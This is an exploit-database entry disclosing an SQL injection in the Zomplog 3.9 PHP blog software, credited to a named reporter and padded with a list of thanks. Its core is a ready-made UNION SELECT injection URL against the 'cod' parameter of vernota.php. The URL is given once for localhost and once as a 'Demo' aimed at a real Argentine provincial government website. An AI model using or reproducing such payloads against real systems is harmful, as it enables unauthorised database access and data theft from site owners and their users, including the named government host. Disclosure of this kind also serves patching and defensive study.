Zomplog 3.9 SQL Injection Vulnerability

2011-03-15T00:00:00
ID 1337DAY-ID-15603
Type zdt
Reporter Daniel Godoy
Modified 2011-03-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Zomplog 3.9 SQL Injection Vulnerability
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Zomplog  3.9
# Download: http://www.zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick Jordan,Animacco ,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El Rodrix, l0ve, NetTxic,
Gusan0r, Sabertrail, Maxi Soler, Darioxhcx,r0dr1,Zer0-Zo0rg, y0u-know


[POC]
http://localhost/zomplog3.9/vernota.php?cod=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

[Demo]
http://www.planificacion.catamarca.gov.ar/zomplog3.9/vernota.php?cod=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--



#  0day.today [2018-04-01]  #